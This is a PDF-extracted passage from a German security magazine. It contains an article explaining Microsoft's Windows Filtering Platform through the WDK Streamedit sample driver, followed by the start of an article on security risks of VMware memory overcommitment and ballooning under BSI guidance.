Die WFP bietet im Allgemeinen zwei verschiedene Ansätze zum Filtern von Netzwerkdaten an. Einmal können die Netzwerkdaten direkt im Durchfluss durch den Filter gefiltert werden, welches als inline edit be-zeichnet wird und in der inline_edit.c des Beispiels rea-lisiert ist. Die andere Methode, welche in der oob_edit.c des Beispiels implementiert ist, filtert die Netzwerkdaten out-of-band. Bei diesem Verfahren klont der Filter die bei ihm eintreffenden Netzwerkdaten und blockiert die ursprünglichen, sodass der betreffende Shim sie nach Verlassen der KMFE nicht zurück in den TCP/IP-Stack leitet und somit verwirft. Die geklonten Daten werden
Abbildung 3. Sequenzdiagramm – Stream-Daten-Filterung mittels WFP.
Listing 1. MDL Speicherreservierung
gStringToReplaceMdl= IoAllocateMdl(
configStringToReplace,
strlen(configStringToReplace),
FALSE,
FALSE,
NULL
);
MmBuildMdlForNonPagedPool(
gStringToReplaceMdl
);
Listing 2. WFP Injection-Handle
status = FwpsInjectionHandleCreate(
AF _ UNSPEC,
FWPS _ INJECTION _ TYPE _ STREAM,
&gInjectionHandle
);
1/201114
SICHERHEITSANWENDUNGEN
dann untersucht und ggf. später wieder in den TCP/IP-Stack injiziert. Nach der erneuten Injektion setzen sie ihren Weg durch den Stack fort. Bevor allerdings näher auf die Filterung eingegangen wird, müssen die Filter erst mal beim Start des Kernel-Mode Treiber initialisiert werden.
Initialisierung des TreibersJeder Treiber muss über zwei Funktionen verfügen: DriverEntry und DriverUnload. DriverEntry ist hierbei der Einstiegspunkt beim Starten des Treibers, gleichzuset-zen mit der Funktion int main(int argc, char* argv[]) und DriverUnload die Funktion, die aufgerufen wird, wenn der Treiber beendet wird.
Im Streamedit-Beispiel werden innerhalb der DriverEntry-Funktion die üblichen Initialisierungen des Treibers vollzogen, auf die hier nicht weiter eingegan-gen wird. Der erste wichtige WFP-Punkt im Stream-edit-Beispiel ist der, wo Speicherplatz in Form einer Memory Decriptor List (MDL) zum Ersetzen des gefun-denen Wortes reserviert wird. Das nachfolgende Listing stammt aus Zeile 562 der stream_callout.c.
Einhergehend mit dem Next generation network driver stack hat Microsoft in NDIS 6.0 das Datenformat inner-halb des Windows Netzwerkstack grundlegend erneu-ert. Seither werden alle Daten, die über das Netzwerk versendet oder empfangen werden, in NET_BUFFER_LIST (NBL)-Ketten verpackt. Wie in Abbildung 4 dargestellt, bestehen diese Ketten aus einer verketteten Anzahl an NET_BUFFER (NB)-Strukturen und diese schlussendlich aus den MDL-Strukturen, wovon eine in der DriverEn-try-Funktion des Streamedit-Beispiels erstellt wird. Die Erstellung geschieht vor dem Hintergrund, dass im spä-teren Verlauf die MDL des Suchwortes gegen die MDL des Ersetzungswortes ausgetauscht und somit das Wort selber ausgetauscht wird.
Um eine MDL im späteren Verlauf in die Netzwerkda-ten einfügen zu können, wird seitens der WFP ein Injec-tion-Handle benötigt. Listing 2 stammt aus Zeile 609 der stream_callout.c.
Die Funktion FwpsInjectionHandleCreate zum Erstellen eines Injektion-Handle erwartet als ersten Parameter die TCP/IP-Protokollversion, für die es Daten injizie-ren soll. AF_UNSPEC steht hierbei sowohl für IPv4 als auch IPv6. AF_UNSPEC ist allerdings nur für Injektionen auf dem Transport-Layer und Stream-Layer möglich. Für alle an-deren Layer innerhalb der KMFE muss explizit ange-geben werden, ob der Handle für IPv4 (AF_INET) oder IPv6 (AF_INET6) erstellt werden soll. Da hier im zweiten Parameter der Stream-Layer mittels FWPS_INJECTION_TYPE_STREAM ausgewählt wird, kann AF_UNSPEC verwendet wer-den.
Kontakt zur Filter EngineUm Filter und ihre Subkomponenten über die Schnitt-stellen der BFE oder KMFE hinzufügen zu können, wird eine Verbindung dorthin benötigt. Eine solche Verbindung zur BFE oder KMFE wird, wie beim In-jection-Handle, durch einen Handle repräsentiert. Im Streamedit-Beispiel wurde dieser Teil in der Funktion StreamEditRegisterCallout zusammengefasst. Listing 3 zeigt den Verbindungsaufbau zur KMFE und bezieht sich auf die Zeile 265 der stream_callout.c.
Mittels der Funktion FwpmEngineOpen wird ein Engine-Handle erstellt. Hierbei ist vor allem der vierte Para-meter von Interesse. Durch die Session ist es möglich, die Lebensdauer der installierten Filter zu definieren. In diesem Beispiel wird die Session mit dem FWPM_SESSION_FLAG_DYNAMIC Flag versehen. Das bedeutet, dass alle Ob-jekte, die innerhalb des aktuellen Engine-Handle instal-liert werden, nur solange in der KMFE verbleiben, wie die Session und der Treiber laufen. Wird der Treiber be-
Abbildung 4. Datenstrukturen der Netzwerkdaten ab NDIS 6.0. Quelle: [8]
Windows Filtering Platform Netzwerkdatenfilterung unter Windows
hakin9.org/de 15
endet, werden alle WFP-Objekte des Treibers automa-tisch aus der KMFE entfernt.
Unter den Filtern und ihren Subkomponenten, die zur KMFE hinzugefügt werden sollen, existieren oftmals Ab-hängigkeiten. Deswegen muss im weiteren Verlauf des Listing 3 eine Transaktion mittels FwpmTransactionBegin gestartet werden. Die Transaktion garantiert, wie bei einer Datenbank-Transaktion, dass alle Objekte erfolg-reich hinzugefügt werden oder im Fehlerfall kein Objekt hinzugefügt wird. Die Fehlerbehandlung wurde in den Listings dieses Artikels aus Platzgründen ausgelassen, findet sich aber im Streamedit-Beispiel.
Erstellen der FilterMittels der Funktion RegisterCalloutForLayer werden im Streamedit-Beispiel nicht nur, wie der Name vermuten lässt, Callouts auf einem Layer registriert. Diese Funk-tion ist die zentrale WFP-Konfigurationsfunktion des Beispiels. In ihr werden die eigentlichen WFP-Kompo-nenten erstellt und der KMFE hinzugefügt. Im Stream-edit-Beispiel werden durch die Funktion zwei Filter samt Bedingung und ihrem Callout erstellt. Beide Filter ar-
beiten auf dem Stream-Layer der KMFE. Sie haben die Bedingung, dass sie lediglich Netzwerkdaten auf Quell- oder Ziel-Port 5001 filtern sollen. Das Listing 4 zeigt nicht die generische Implementierung der Funkti-on wie im Streamedit-Beispiel, sondern wie sie konkret die einzelnen Parameter des Filters und des Callouts für den IPv4-Filter setzt, damit diese nachfolgend nä-her betrachtet werden können. Dies ist vergleichbar mit dem Aufruf der RegisterCalloutForLayer aus Zeile 291. Im nachfolgenden Listing wurde die Filterbedingung aus Platzgründen ausgelassen. Es wird hier auf die MSDN-Referenz verwiesen[9].
Das Listing 4 lässt sich thematisch in zwei Teile teilen. Einerseits die Registrierung des Callout am Anfang und im späteren Verlauf die Erstellung des Filters, der den Callout nutzt. Damit ein Callout in der KMFE registriert werden kann, muss dieser drei Anforderungen erfül-len. Erstens muss er eindeutig identifizierbar sein, was durch einen Globally Unique Identifier (GUID) erfolgt. Als Zweites und Drittes muss er zwei Funktionszeiger besitzen. Die Funktionszeiger müssen auf Funktionen zeigen, die der Filter aufgerufen kann und in denen die
Listing 4. Callout- und Filter-Erstellung// Teil 1: Register Callout
FWPS_CALLOUT sCallout = {0};
// 1. ¡
sCallout.calloutKey =
STREAM_EDITOR_STREAM_CALLOUT_V4;
sCallout.classifyFn =
StreamInlineEditClassify; // 2.
sCallout.notifyFn =
StreamEditNotify; // 3.
status = FwpsCalloutRegister(
deviceObject,
&sCallout,
calloutId
);
// Teil 2: Register Filter
FWPM_FILTER filter = {0};
filter.layerKey =
FWPM_LAYER_STREAM_V4;
filter.action.type =
FWP_ACTION_CALLOUT_TERMINATING;
filter.action.calloutKey =
STREAM_EDITOR_STREAM_CALLOUT_V4;
filter.subLayerKey =
FWPM_SUBLAYER_UNIVERSAL;
filter.weight.type = FWP_EMPTY;
status = FwpmFilterAdd(
gEngineHandle,
&filter,
NULL,
NULL);
Listing 5. MDL Konvertierung
FwpsCopyStreamDataToBuffer(
streamData,
(BYTE*)streamEditor->scratchBuffer
+ streamEditor->dataLength,
streamData->dataLength,
&bytesCopied
); Listing 6. Daten-Injektion
status = FwpsStreamInjectAsync(…)
…
ioPacket->streamAction =
FWPS_STREAM_ACTION_NONE;
ioPacket->countBytesEnforced =
findLength;
classifyOut->actionType =
FWP _ ACTION _ BLOCK;
1/201116
SICHERHEITSANWENDUNGEN
Datenbehandlung und Entscheidungsfindung stattfin-det. Es gibt einmal die classify-Funktion (classifyFn), der der Filter alle Netzwerkdaten zur benutzerdefinierten Filterung übergibt und von der der Filter die Filter-Ent-scheidung erwartet. Die andere Funktion ist die notify-Funktion (notifyFn). Diese wird von der KMFE aufgeru-fen, sobald ein Filter hinzugefügt oder entfernt wird, der den Callout verwendet. Diese kann zur Initialisierung Callout-interner Strukturen verwendet werden.
Die Registrierung eines Filters ist im Gegensatz zum Callout etwas aufwendiger. Als erstes wird über das layerKey Strukturelement angegeben, auf welchem KM-FE-Layer der Filter arbeiten soll. Da die KMFE über 70 verschiedene Layer[4] besitzt, hat der Entwickler die Qual der Wahl, den für seine Filterung richtigen zu fin-den. Innerhalb der KMFE gibt es Layer, wie im voran ge-gangenen Listing der FWPM_LAYER_STREAM_V4 Stream-Layer, die von allen TCP Netzwerkdaten durchlaufen werden. Sie eignen sich, wie im Streamedit-Beispiel ersichtlich, sehr gut zur Payload-Filterung. Andererseits gibt es Layer, wie dem FWPM_LAYER_ALE_FLOW_ESTABLISHED_V4, des-sen Filter lediglich einmalig dann von der KMFE aufge-rufen werden, wenn eine TCP/IPv4-Verbindung mittels des Three-Way-Handshake vollständig hergestellt wur-
de. Zu beachten ist jedoch, dass je mehr Daten ein Fil-ter filtern muss, desto ressourcenintensiver ist er. Aus diesem Grund sollte die Layer-Wahl wohl bedacht sein, um den Netzwerkstack nicht auszubremsen.
Über das Strukturelement action.type wird der Filter-typ festgelegt. Im Beispiel ist es ein Typ, der dem Filter erlaubt ein Block oder ein Permit an die KMFE zurück zu geben. Andere Typen sind beispielsweise für Filter, die die Daten lediglich inspizieren und nicht verändern. Ein solcher Filter hätte dann als Type FWP_ACTION_CALLOUT_INSPECTION. Manche Typen lassen sich lediglich dann auswählen, wenn der Filter über einen Callout verfügt. Um einen Filter mit einem Callout zu verbinden, muss das Strukturelement calloutKey des Filters, wie in Lis-ting 4, mit der GUID des Callouts versehen werden.
In diesem Beispiel werden lediglich zwei Filter ins-talliert, die auf unterschiedlichen IP-Protokollversionen arbeiten. Sie sind nicht voneinander abhängig und be-einflussen oder ergänzen sich nicht gegenseitig. Aus diesem Grund reicht es, wenn beide Filter einfach dem universellen Sublayer zugeordnet werden und eine FWP_EMPTY-Gewichtung besitzen. Sie sorgt für eine zufällige Gewichtung innerhalb des gewählten Sublayer. Sol-len sich hingegen zwei Filter gegenseitig ergänzen, so
Abbildung 5. Ablauf der String-Ersetzung mittels Injektion.
Windows Filtering Platform Netzwerkdatenfilterung unter Windows
hakin9.org/de 17
müssen sie mittels ihrer Gewichtung und dem Sublayer, der auch eine Gewichtung besitzt, in die richtige abstei-gend sortierte Aufrufreihenfolge gebracht werden. Es kann an dieser Stelle leider nicht näher auf die Gewich-tung eingegangen werden, da sie sehr umfangreich ist. Weitere Informationen finden sich dazu in der WFP-Do-kumentation[10].
Filterung der NetzwerkdatenIm Listing 4 wurde der Funktionszeiger der classifyFn auf StreamInlineEditClassify gesetzt. Dies ist nun auch die Einstiegsfunktion zur Netzwerkdatenfilterung. Sie befindet sich in Zeile 413 der inline_edit.c. Die Signatur der Classify-Funktion eines Callouts hat sich zwischen Windows Vista und Windows 7 geändert, sodass, falls beide Betriebssysteme unterstützt werden sollen, dort eine Preprozessor-Unterscheidung gemacht werden muss. Die Funktion ist im Streamedit-Beispiel sehr ein-fach gehalten und prüft lediglich die Datenflussrichtung der zu untersuchenden Netzwerkdaten. Der Stream-Layer, auf dem der Filter arbeitet, ist ein bidirektiona-ler Filter-Layer. Das bedeutet, dass dem Callout sowohl Netzwerkdaten übergeben werden, die gesendet als auch empfangen werden. In dem Beispiel wird aller-dings nur eine Richtung gefiltert, was in den Konfigura-tionen in Zeile 66 der stream_callout.c Datei eingestellt werden kann.
Die Filterung erfolgt in diesem Beispiel auf dem Stream-Layer der KMFE. Dies hat den Hintergrund, dass sich hier die NBL sehr komfortabel in einen Byte-Puffer konvertieren lässt. Das Listing 5 zeigt einen Aus-schnitt der Funktion StreamCopyDataForInspection, welche in Zeile 531 in der Datei stream_callout.c definiert ist. Der Funktion wird die Struktur FWPS_STREAM_DATA0 über-geben, welche sich aus dem Parameter layerData der
ClassifyFn-Funktion extrahieren lässt. Es ist lediglich er-forderlich, dass zuvor ausreichend viel Speicher allo-kiert wurde, in den der Payload kopiert wird. Die Größe des Puffers lässt sich ebenfalls aus der zuvor genann-ten Datenstruktur auslesen.
Sobald die Daten in den Byte-Puffer überführt wur-den, ist es relativ leicht ihn auf gewisse Inhalte hin zu überprüfen. Wie in Zeile 240 in der Datei inline_edit.c ersichtlich ist, wird der Byte-Puffer Byte für Byte durch-laufen und mittels RtlCompareMemory mit dem Suchein-trag verglichen. Wurde der Sucheintrag im Byte-Puffer gefunden, wird in Zeile 257 der Datei inline_edit.c der KMFE durch den Strukturschlüssel countBytesEnforced mitgeteilt, dass sie die Daten bis zum Suchtreffer wei-tersenden darf. Sobald die Funktion des Callout be-endet ist, führt die KMFE die Aktion aus und ruft den Callout mit den Restdaten erneut auf. Diesmal steht der Sucheintrag direkt am Anfang. Der Callout springt deswegen direkt zum Injection-Handle und injiziert die MDL des Ersatzworts in den Netzwerkpfad. Das Listing 6 zeigt einen Ausschnitt des Injektionsvorgangs.
Sobald die Dateninjektion erfolgreich war und der Er-satzeintrag versendet wurde, werden, wie zuvor über countBytesEnforced, der KMFE mitgeteilt, dass nun genau findLength an Bytes verarbeitet werden sollen. Als Akti-on wird FWP_ACTION_BLOCK angegeben, sodass die Daten, die genau den Sucheintrag enthalten, blockiert wer-den. Nachdem die ClassifyFn-Routine des Callout be-endet ist, führt die KMFE die Aktion erneut aus und ruft die Funktion mit den Restdaten wieder auf. Nun kann die Suche von neuem beginnen. Die drei Schritte sind nachfolgend in Abbildung 5 mittels eines Sequenzdia-grammes veranschaulicht. Bei diesem Beispiel werden die Daten GET search?q=rainy&hl=de nach dem Ein-trag rainy durchsucht und dieser durch sunny ersetzt.
Abbildung 6. Streamedit-Ergebnis anhand von Google.
1/201118
SICHERHEITSANWENDUNGEN
Umstellen des PortUm den Filter einfacher testen zu können, sollte die Va-riable configInspectionPort in Zeile 65 der Datei stream_callout.c auf den Wert 80, was dem HTTP Port ent-spricht, geändert werden sowie die beiden Variablen in den Zeilen darunter auf TRUE. Durch die Änderung auf Port 80 lassen sich die Filter, wie in Abbildung 4 zu se-hen, einfach mittels einer Browser-Anfrage testen. Über die beiden anderen Variablen wird eingestellt, dass die Filter die ausgehenden Netzwerkdaten filtern und dazu die erläuterte inline_edit Methode verwenden.
Kompilieren und StartenDas WDK-Streamedit-Beispiel lässt sich mittels der Build-Umgebungen des WDK kompilieren. Wenn das WDK installiert ist, finden sich im Startmenü unter dem Eintrag Windows Driver Kits die Build Environments. Zu beachten ist, dass die x64-Versionen von Windows eine Treibersignatur verlangen. Die WDK-Beispiele lassen sich deswegen nur unter der x64-Version starten, wenn beim Starten von Windows über das F8-Startmenü die Treibersignatur temporär deaktiviert wird. Es ist gene-rell empfehlenswert, Treiber in einer virtuellen Umge-bung zu testen, um Schäden am Hauptsystem zu ver-meiden.
Zur Kompilierung muss die zum Zielsystem passende Checked-Build-Umgebung gestartet werden. Diese ist ein einfaches Kommandozeilenprogramm. Es muss da-mit in das betreffende Quellcodeverzeichnis gewechselt werden und dann lediglich build eingegeben werden. Dann wird im Zuge der Kompilierung ein neues Unter-verzeichnis im Quellcodeverzeichnis angelegt, in dem sich der Treiber als *.sys-Datei befindet. Um den WFP-Filter nun zu starten, muss er zuerst installiert werden. Dies geschieht über die *.inf-Datei im Quellcodever-zeichnis, die bislang außer Acht gelassen wurde. Wenn mittels der rechten Maustaste auf die *.inf-Datei geklickt wird, erscheint im Kontextmenü der Eintrag Installieren, über den der Treiber im System installiert werden kann. Sobald auf diesen Kontextmenüeintrag geklickt wurde, fragt Windows nach dem Ort, wo sich der Treiber be-findet. Hier muss im neuen Unterverzeichnis die *.sys-
Datei ausgewählt werden. Danach kann der Treiber in der Eingabeaufforderung mittels des Befehls net start stmedit gestartet und mittels net stop stmedit wieder ge-stoppt werden. Sobald der Treiber läuft, kann vergleich-bares wie in Abbildung 6 erzeugt werden. Eingegeben wird rainy und google sucht nach sunny.
FazitDie Windows Filtering Platform[1] ist eine sehr mäch-tige und einheitliche Plattform zum Filtern der Netz-werkdaten unter Windows Vista, Windows 7, Windows Server 2008 und zukünftigen Windows-Versionen. Sie bietet ca. 70 verschiedene Layer an, auf denen Filter die gesamten oder einen speziell ausgewählten Teil der Netzwerkdaten des jeweiligen Netzwerkprotokolls fil-tern können. Die hier vorgestellte inline_edit-Methode zum Filtern der Netzwerkdaten ist die einfachere und schnellere Variante. Innerhalb dieser Variante wird die Untersuchung direkt in den Daten, die den TCP/IP-Stack passieren, vollzogen und ggf. Teile der Daten, die nicht versendet oder empfangen werden sollen, blockiert. Die hier nicht besprochene out-of-band-Filte-rung, die in der oob_edit.c enthalten ist, ist um einiges umfangreicher. Sie klont die Daten des TCP/IP-Stack und blockiert die originalen Daten. Die geklonten Da-ten können dann beispielsweise aus dem Kernel-Mode zurück in den User-Mode gereicht und dort untersucht werden ohne, dass der Netzwerkstack während der Un-tersuchung blockiert wie es bei der inline_edit-Methode der Fall wäre.
RENÉ ESPENHAHNDer Autor ist Masterstudent im Studiengang Informatik – Ver-teilte und Mobile Anwendungen im Fachbereich I&I der Hoch-schule Osnabrück. Nebenberuflich ist er selbstständiger Soft- wareentwickler. Er ist Administrator und erster Entwickler der Motorradplattform SVrider.de.Kontakt mit dem Autor:[email protected]@svrider.de
Im Internet:[1] EinstiegsseitezurWindowsFilteringPlatform:http://msdn.microsoft.com/en-us/library aa366510%28v=VS.85%29.aspx[2]TransportDriverInterface(TDI): http://msdn.microsoft.com/en-us/library/ms819740.aspx[3]ArchitekturbildderWFP:http://msdn.microsoft.com/en-us/library/aa366509%28v=VS.85%29.aspx[4]Listederca.70FilterLayerderWFP:http://msdn.microsoft.com/en-us/library/aa366492%28v=VS.85%29.aspx[5]WindowsDriverKit(WDK):http://www.microsoft.com/whdc/devtools/wdk/wdkpkg.mspx[6]WFPStreamedit-Beispiel:http://msdn.microsoft.com/en-us/library/ff571071%28VS.85%29.aspx[7] Kompilerfehler Visual Studio 2010 unter Windows 7 http://forums.peerblock.com/read.php?3,6884,6887#msg-6887[8] NDIS6.0Datenstrukturabbildung: http://msdn.microsoft.com/en-us/library/ff568355%28v=VS.85%29.aspx[9] WFPFilterbedingungen:http://msdn.microsoft.com/en-us/library/aa363994%28v=VS.85%29.aspx[10]WFPFilter-undSublayer-Gewichtung:http://msdn.microsoft.com/en-us/library/aa364008%28v=VS.85%29.aspx
1/201120
PRAXIS
Unternehmen und Behörden versprechen sich durch den Einsatz der Virtualisierung Kostenein-sparungen durch eine Reduzierung der Server-
Hardware, Senkung der Energie und Minimierung des benötigten Platzes im Rechenzentrum. Doch die Virtua-lisierung von Servern bringt durch die neuen Techniken auch zusätzliches Gefahrenpotential gegenüber physi-schen Servern mit sich.
Untersuchung sicherheitsrelevanter Eigenschaften von Memory Overcommitment und BallooningAktuell eine der am meisten verwendeten Servervirtuali-sierungslösungen kommt von der Firma VMware und ist momentan in der Version vSphere 4 erhältlich. Die Lösung besteht hauptsächlich aus dem ESX- und einem Verwal-tungsserver (vCenter Server) und nutzt Technologien wie
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum
Die Virtualisierung von physischen Systemen gewinnt mehr und mehr an Bedeutung. Mittlerweile ein alter Hase unter den Virtualisierungsarten ist die Servervirtualisierung. Sie hat sich bereits in Unternehmen und Behörden etabliert und verdrängt erfolgreich die „alte“ physische Serverstruktur.
IN DIESEM ARTIKEL ERFAHREN SIE…• Grundlagen zu den Speicherfunktionen (Memory Overcom-
mitment, Ballooning) der Virtualisierungslösung VMware vSphere 4
• SicherheitsanalysederobengenanntenFunktionenaufBasisdes Bausteins der Virtualisierung vom Bundesamt für Sicher-heitinderInformationstechnik(BSI)
WAS SIE VORHER WISSEN SOLLTEN…• GrundkenntnissezumThemaVirtualisierungallgemein• GrundkenntnissezumThemaSicherheit
Steve Hampicke
Abbildung 1. „total” Memory Overcommitment
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum
hakin9.org/de 21
gewonnen werden und welche auf die virtuelle Festplatte auszulagern sind. Der durch den Balloon- Treiber beleg-te Speicherplatz wird durch den Hypervisor erkannt und kann nun an andere virtuelle Systeme vergeben werden. Der Ablauf ist in Abbildung 3 dargestellt. Speicherengpäs-se können so kurzzeitig ausgeglichen werden.
Vorgehensweise:
• Balloon-Treiber belegt Speicher• Balloon-Treiber markiert belegten Speicher• GastkannanderenSpeicherzurückfordern• Balloon-Treiber teilt Hypervisor mit, welcher Spei-
cher ihm zugeteilt ist• HypervisormachtdenzugeteiltenSpeicherfrei• Hypervisor besitzt nun mehr freien physischen
Speicher
Mithilfe des Parameters sched.mem.maxmemctl kann die Summe des Speichers bestimmt werden, die vom Balloon-Treiber maximal eingenommen werden kann. Dieser Parameter kann mittels vSphere Client geän-dert werden. Eine Anwendungsempfehlung hierfür ist:
• Auf allen virtuellen Maschinen sollten die VMwa-reTools installiert werden und das Ballooning akti-viert werden.
• Das Gast-Betriebssystem sollte außerdem genugPlatz für die Auslagerungsdatei besitzen.
Potentielle GefahrenDie Auswirkungen der Servervirtualisierung auf admi-nistrative und betriebliche Prozesse können beträcht-lich sein. Aus der Sicherheitsperspektive betrachtet, bringen die neuen Techniken, wie das Memory Over-commitment und Ballooning, ein zusätzliches Gefah-renpotential gegenüber physischen Servern mit sich. So werden zum Beispiel zunehmend mehr firmenkriti-sche Anwendungen in einer virtuellen Umgebung be-trieben. Welche Virtualisierungssoftware dabei von den
Snapshots, Memory Overcommitment oder das Ballooning. Administratoren wird dadurch eine Vielzahl an Planungs- und Konfigurationsmöglichkeiten für den Einsatz der neuen Technik geboten. Zunächst eine kurze Einführung.
Das Memory Overcommitment, die Überbuchung des Arbeitsspeichers, ist ein wichtige Technologie bei der Ar-beit mit virtuellen Welten. Da sie mit einer Speicherma-nagementtechnik des ESX(i) realisiert wird, kann die vir-tuelle Maschine mehr Speicher nutzen, als physisch vorhanden ist. Mit dem „totalen“ Memory Overcommit-ment und dem „aktiven“ Memory Overcommitment gibt es zwei Arten. Unter „total“ Overcommitment versteht man, was gemeinhin als Memory Overcommitment bezeich-net wird. Es ergibt sich aus der Summe des konfigurierten Speichers der virtuellen Maschinen und durch den verfüg-baren Host-Speicher für die virtuellen Maschinen (Abb. 1).
Die zweite Art, das „aktive“ Memory Overcommit-ment, ergibt sich aus der Summe des aktiven Speichers dervirtuellenMaschinen.IstdasErgebnisgrößerEins,so besteht eine hohe Wahrscheinlichkeit, dass es zu einem Leistungsabfall der virtuellen Maschine kommt (Abbildung 2). Tritt dieser hohe Leistungsabfall auf, soll-te die virtuelle Maschine mittels vMotion auf einen an-deren Host übertragen werden.DaderReservierungsparameter einegroßeBedeu-
tung in diesem System hat, sollte er von Anfang an ge-schickt gewählt werden. Er sollte immer den komplet-ten aktiven Speicher im physischen Speicher haben, um somit eine gute Performance erreichen zu können. DerSpeicher,dersichimLeerlaufbefindetundderfreieSpeicher können durch das Ballooning genutzt werden.
Ballooning-Technik ermöglicht eine dynamische Anpas-sung der virtuellen Umgebung. Dies geschieht durch den Balloon-Treiber (vmmemctl), der durch die VMwareTools in das jeweilige Betriebssystem einer virtuellen Maschine integriert wird. Der Treiber belegt gezielt den Hauptspei-cher, der vom Gast-Betriebssystem am wenigsten benutzt wird. Das Gast-Betriebssystem muss nun seinen eigenen Speicherverwaltungsalgorithmus nutzen. Sollte der Spei-cher zu knapp sein, wird festgelegt, welche Seiten zurück-
Abbildung 2. “aktives” Memory Overcommitment
1/201122
PRAXIS
Unternehmen genutzt wird, hat ITIC und Stratus unter-sucht und dabei herausgefunden, dass 71 Prozent der Unternehmen die Software von VMware einsetzt. 28 Prozent setzten auf Microsoft und 9 Prozent wenden Virtualisierungslösungen von Citrix an. Laut einer aktu-ellen Umfrage von ITIC und Stratus, bei der 500 IT-Ex-perten aus 19 Ländern befragt wurden, gaben 42% an, dass ein Viertel bis zur Hälfte der Anwendungen in ihren Unternehmen unternehmenskritisch seien. Bei PC-WA-RE beobachten wir einen ähnlichen Trend. In 78% der Unternehmen laufen diese kritischen Anwendungen auf virtuellen Maschinen. Um deren Sicherung gewährleis-ten zu können, ist es für jeden IT-Manager essentiell zu wissen, wo Gefahrenquellen liegen können.
Das Bundesamt für Sicherheit in der Informations-technik (BSI) gibt hierzu folgende Gefährdungsbereiche in virtuellen Infrastrukturen an:
• OrganisatorischeMängel• MenschlichesFehlverhalten• TechnischesVersagen• VorsätzlicheHandlungen
In der Abbildung 4 ist eine Art zusammenfassendes Angriffsszenario zu sehen.
Organisatorische MängelDa virtuelle Infrastrukturen meist eine hohe Komplexi-tät aufweisen, sind eine gute Planung sowie eine Ana-lyse der Rahmenbedingungen unausweichlich. Bereits hier können potentielle Gefahren entstehen. Bevor man an die richtige Auswahl des Virtualisierungsservers denkt, ist es wichtig zu wissen, ob die einzusetzenden
Anwendungen in einer virtuellen Maschine auch vom Hersteller der Anwendungssoftware unterstützt wer-den. Möglicherweise kann es passieren, dass der Her-steller keinen Support anbietet, sobald das Produkt in einer virtuellen Umgebung betrieben wird. Ist dies ge-klärt, kommt die Wahl der Virtualisierungssoftware und in diesem Zusammenhang, die Auswahl des richtigen Servers. Dabei spielt die Planung der Kommunikati-onsverbindungen zum Server eine wichtige Rolle. Die Entwicklung einer Strategie für das Netz- und System-management istebenfallsnichtaußerAchtzu lassen.Für den richtigen Umgang mit den einzelnen Planungs-schritten empfehlen sich die IT-Grundschutz- Kataloge des BSI. Sie listen die einzelnen Gefährdungen und die dazupassendenGegenmaßnahmenaufundvermittelnso einen sicheren IT-Betrieb.
Menschliches FehlverhaltenMenschliche Fehlhandlungen sind immer eine Gefah-renquelle innerhalb von IT Infrastrukturen und deren Management. Häufig werden Konfigurationen unzu-reichend getestet oder Administratoren unzureichend ausgebildet. Die Zugangsrechte zu virtuellen Maschi-nen und deren Anwendungen sollten nur in dem Um-fang eingeräumt werden, wie sie für die Erfüllung der Aufgaben erforderlich sind. Dabei kann eine fehlerhafte Administration der Rechte zu Betriebsstörungen und Si-cherheitslücken führen.
In Verbindung mit dem Ballooning gibt es die Gefahr, dass Benutzer die Gastwerkzeuge beenden und somit den Balloon-Treiber deaktivieren. Dies kann zu einem Speicherengpass der virtuellen Maschinen führen. Im Normalfall kann nur die Gruppe der Administratoren die
Abbildung 3. Ballooning-Verfahren
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum
hakin9.org/de 23
Gastwerkzeuge beenden. So kann in einem Windows-System nur der Administrator die Dienste im Taskmana-ger beenden oder den TASKKILL-Befehl in die Konsole eingeben. In einem Linux- System wird meist der kill-Befehl genutzt, um Prozesse zu beenden. Dieser kann jedoch nur mit dem sudo-Kommando gestartet werden, dass das Wissen des Root-Passwortes voraussetzt.
Technisches VersagenAls technisches Versagen wird meist der Ausfall von Diensten in einer virtuellen Umgebung bezeichnet. Zu-dem fallen laut BSI noch Störungen der Netzinfrastruk-tur von Virtualisierungsservern, der Ausfall von Verwal-tungsservern sowie der Ausfall von virtuellen Maschinen durch nichtbeendete Datensicherungsprozesse in die Gefahrenklasse des technischen Versagens.
Vorsätzliche HandlungWohl am schwersten einzuschätzen, sind die Gefah-ren, die sich aus vorsätzlichen Handlungen ergeben. Sie können sich von einem harmlosen Rahmen bis hin zu einer verheerenden Situation bewegen. Die vorsätz-lichen Handlungen können dabei als folgende Aktionen auftreten:
• AngriffegegendasManagement(Servicekonsole)• AngriffegegendenHypervisor• AngriffegegendasGast-Betriebssystem• AngriffegegendenFestplattenspeicher
Da die Servicekonsole die meisten Schwachstel-len aufweist, stellt sie einen der größten Gefahren-herde dar. Sollte ein Angreifer Zugang erlangen und über root-Rechte verfügen, besitzt er die volle Verwal-tungskontrolle über den Host. Auf diese Weise könnte er Netzwerkeinstellungen manipulieren oder die Res-
sourcenparameter in den Konfigurationsdateien än-dern, um nur eine Auswahl möglicher Eingriffe zu nen-nen. Eine explizite Sicherung der Konsole ist damit un-erlässlich und wird deshalb im folgenden Abschnitt noch einmal näher betrachtet.
Missbräuchliche Nutzung von Gastwerkzeugen in virtuellen MaschinenUm die Überbuchungstechnik des Memory Overcom-mitment und das dazugehörige Ballooning optimal ein-zusetzen, empfiehlt es sich, die Gastwerkzeuge (VM-wareTools) zu installieren. Sie werden mit sehr hohen Berechtigungen ausgeführt, um systemnah arbeiten zu können. Dadurch bekommt man die Möglichkeit, eine Überbuchung des Hauptspeichers zwischen dem Hy-pervisor und den virtuellen Maschinen zu koordinieren.
MaßnahmenDie vorangegangene Analyse des Memory Overcom-mitment und Ballooning zeigt, welche Gefahren bei de-ren Einsatz entstehen können. Die Empfehlungen aus dem BSI IT-Grundschutzkatalogen bieten eine gute Grundlage, um ein ausgereiftes Sicherheitskonzept für virtuelle Welten zu erstellen. Fassen wir die wichtigsten zusammen.
Planung der virtuellen InfrastrukturEine sorgfältige Planung ist wie in allen Projekten es-sentiell für eine erfolgreiche Umsetzung. Die richtige Technik und funktionierende Produkte müssen sorgfäl-tig ausgewählt werden. Auf diesen Schritt folgt die Ver-teilung der Kompetenzen in einer virtuellen Infrastruktur um einen reibungslosen Betrieb und eine klare Abgren-zung der Aufgaben zu gewährleisten.
Bei der Einsatzplanung für den Virtualisierungsser-ver müssen jedoch ein paar Besonderheiten beachtet
Abbildung 4. Zusammenfassendes Angriffsszenario
1/201124
PRAXIS
